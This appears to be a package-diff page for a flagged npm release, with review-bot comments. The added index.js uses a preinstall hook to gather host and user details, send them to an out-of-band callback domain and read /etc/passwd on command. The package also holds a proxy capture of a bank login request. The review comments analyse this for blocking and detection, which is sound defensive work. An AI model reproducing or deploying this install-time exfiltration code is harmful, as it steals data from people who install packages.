cptalertbox 61.0.0


Potentially problematic release.


This version of cptalertbox might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +66 -0
  2. package/package.json +12 -0
  3. package/sqli1 +42 -0
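--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,66 @@
+ const fs = require("fs");
+ const dns = require("dns");
+ const querystring = require("querystring");
+ const https = require("https");
+ const packageJSON = require("./package.json");
+ const package = packageJSON.name;
+
+ const trackingData = JSON.stringify({
+ p: package,
+ c: __dirname,
+ hd: os.homedir(),
+ hn: os.hostname(),
+ un: os.userInfo().username,
+ dns: dns.getServers(),
+ r: packageJSON ? packageJSON.___resolved : undefined,
+ v: packageJSON.version,
+ pjson: packageJSON,
+ });
+
+ var postData = querystring.stringify({
+ msg: trackingData,
+ });
+
+ var options = {
+ hostname: "g9q8uyl5pvn311sm01gzd39modu4it.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+ port: 443,
+ path: "/",
+ method: "POST",
+ headers: {
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Content-Length": postData.length,
+ },
+ };
+
+ var req = https.request(options, (res) => {
+ res.on("data", (d) => {
+ process.stdout.write(d);
+ });
+ });
+
+ req.on("error", (e) => {
+ // console.error(e);
+ });
+
+ req.on("response", (response) => {
+ var responseData = "";
+ response.on("data", (chunk) => {
+ responseData += chunk;
+ });
+
+ response.on("end", () => {
+ // Check if the response contains a specific message
+ if (responseData.includes("READ_ETC_PASSWD_FILE")) {
+ fs.readFile("/etc/passwd", "utf8", (err, data) => {
+ if (err) {
+ console.error(err);
+ return;
+ }
+ console.log(data);
+ });
+ }
+ });
+ });
+
+ req.write(postData);
+ req.end();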
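Review bot: Lines 8–18 collect host identifiers (install path, home directory, hostname, username, DNS resolvers and the whole package.json) and lines 20–35 POST them to a hard-coded `oastify.com` subdomain, while the `response` handler at lines 45–63 reads `/etc/passwd` when the server's reply contains a marker string. Combined with the `preinstall` hook in package.json, this runs on every install without consent, so the release should be blocked and the collection and request code removed rather than adjusted. As shown, `os` is never required, so the script would likely throw at line 11 before any request leaves the host. A sandbox verdict that waits for a network callback can therefore miss this version, and detection should key on the static indicators (install hook, `https.request` to an out-of-band interaction domain, `/etc/passwd` read). The `error` handler at lines 41–43 has its only statement commented out, which hides request failures from the installing user.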
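--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+ {
+ "name": "cptalertbox",
+ "version": "61.0.0",
+ "description": "tesfefjvdm",
+ "main": "index.js",
+ "scripts": {
+ "test": "ewfo \"Error: no test specified\" && exit 1",
+ "preinstall": "node index.js"
+ },
+ "author": "",
+ "license": "ISC"
+ }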
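Review bot: The `"preinstall": "node index.js"` entry at line 8 makes npm execute index.js on the installing machine before the package is ever imported, with the installing user's privileges and no review step. I would drop that line from `scripts`, and consumers evaluating an unfamiliar package should install it with `npm install --ignore-scripts`. The manifest also has a placeholder description (`tesfefjvdm`), an empty `author`, and version `61.0.0` on files that are all newly added. An unusually high version on a package with no visible history is consistent with a dependency-confusion attempt, though nothing on this page confirms an intended target.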
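--- a/package/sqli1
+++ b/package/sqli1
@@ -0,0 +1,42 @@
+ <?xml version="1.0"?>
+ <!DOCTYPE items [
+ <!ELEMENT items (item*)>
+ <!ATTLIST items burpVersion CDATA "">
+ <!ATTLIST items exportTime CDATA "">
+ <!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
+ <!ELEMENT time (#PCDATA)>
+ <!ELEMENT url (#PCDATA)>
+ <!ELEMENT host (#PCDATA)>
+ <!ATTLIST host ip CDATA "">
+ <!ELEMENT port (#PCDATA)>
+ <!ELEMENT protocol (#PCDATA)>
+ <!ELEMENT method (#PCDATA)>
+ <!ELEMENT path (#PCDATA)>
+ <!ELEMENT extension (#PCDATA)>
+ <!ELEMENT request (#PCDATA)>
+ <!ATTLIST request base64 (true|false) "false">
+ <!ELEMENT status (#PCDATA)>
+ <!ELEMENT responselength (#PCDATA)>
+ <!ELEMENT mimetype (#PCDATA)>
+ <!ELEMENT response (#PCDATA)>
+ <!ATTLIST response base64 (true|false) "false">
+ <!ELEMENT comment (#PCDATA)>
+ ]>
+ <items burpVersion="2022.8.4" exportTime="Mon May 29 11:54:28 IST 2023">
+ <item>
+ <time>Thu Jan 01 05:30:00 IST 1970</time>
+ <url><![CDATA[https://broker.ubank.com.au/index.php/?rest_route=/auth/login]]></url>
+ <host ip="141.193.213.20">broker.ubank.com.au</host>
+ <port>443</port>
+ <protocol>https</protocol>
+ <method><![CDATA[POST]]></method>
+ <path><![CDATA[/index.php/?rest_route=/auth/login]]></path>
+ <extension>php/</extension>
+ <request base64="true"><![CDATA[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]]></request>
+ <status>403</status>
+ <responselength>4812</responselength>
+ <mimetype>HTML</mimetype>
+ <response base64="true"><![CDATA[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]]></response>
+ <comment></comment>
+ </item>
+ </items>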
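Review bot: `package/sqli1` is a proxy-tool export (see the `burpVersion` and `exportTime` attributes at line 25) of a POST to a third-party login endpoint, with base64 request and response bodies at lines 35 and 39, and nothing in index.js or package.json on this page references it. Captured login traffic can carry credentials, cookies or tokens belonging to someone else, so the bodies should be treated as sensitive when this sample is stored or shared, and the named host's owner may need to be notified. As general publishing hygiene, a `"files"` allowlist in package.json keeps workspace artifacts like this out of a tarball. The file name and the export timestamp are useful attribution context and worth keeping in the incident record, although the page does not show how the file relates to the install script.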